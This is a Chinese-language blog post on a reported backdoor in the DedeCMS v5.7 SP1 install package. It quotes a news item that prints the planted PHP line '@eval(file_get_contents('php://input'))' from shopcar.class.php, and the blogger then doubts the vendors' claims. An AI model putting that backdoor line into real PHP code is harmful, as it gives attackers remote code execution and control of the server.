織夢CMS(DEDECMS)的強大是所有站長人都知道的,也正是TA是國内第一個效仿國外的開源CMS,是以在國内的開源程式變得越來越多,程式的BUG變得越來越少,安全性變得越來越強大,功能性越來越強大。當然更多的效仿程式也越來越多,通過攻擊的也變得越來越多。織夢CMS有後門已經不是一件稀奇的事,用的人多了,安全性也就差了,就如WINDOWS一樣,更新檔不斷,有更新檔說明性能在不斷提升。
最近網易科技有這樣一份新聞:
“瑞星與360今日對外釋出警示,稱國内知名的PHP開源網站管理系統織夢CMS(DedeCms)v5.7 sp1版本安裝包被發現植入後門,黑客可通過此後門直接獲得網站的控制權限,擷取存儲在伺服器上的檔案和資料庫。
據織夢CMS官方資料顯示,目前約有70萬網站使用該系統搭建,涉及企業、政府機關、媒體機構、行業及個人網站等。
安全界人士分析發現,此次織夢CMS曝出的後門惡意代碼存在于購物車類檔案(shopcar.class.php)中,此類檔案被植入一句後門代碼“@eval(file_get_contents(‘php://input’));”。凡是調用該購物車類的檔案均會觸發後門,黑客隻需要構造簡單的資料包送出到伺服器,就能夠擷取到該網站的WebShell,通過對伺服器進一步滲透攻擊,進而擷取伺服器的最高權限,直接通路伺服器上的檔案、資料庫等資訊。(易科)
織夢CMS中被植入的後門代碼”
不排除此新聞的真實性,但是不是安全軟體方的又一份炒作或者想在媒體露下臉,代表他們在安全軟體行業他們是存在的,代表他們的技術還是”權威”的,代表他們檢測機構的效率呢。在此并不是去評論啥,但總想說兩點。
其一,織夢CMS,版本資訊:V5.7正式版( 2011-12-27),從釋出到現在已經三個多月過去了,難道是最近DEDECMS加進去的後門代碼?!
其二,别說“@eval(file_get_contents(‘php://input’));”這樣一條語句啦,連input這檔案裡都沒有,不知道他們是怎麼檢測出來的
![dedecms背景資料庫備份遷移流程[圖]](data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACwAAAAAAQABAAACAkQBADs=)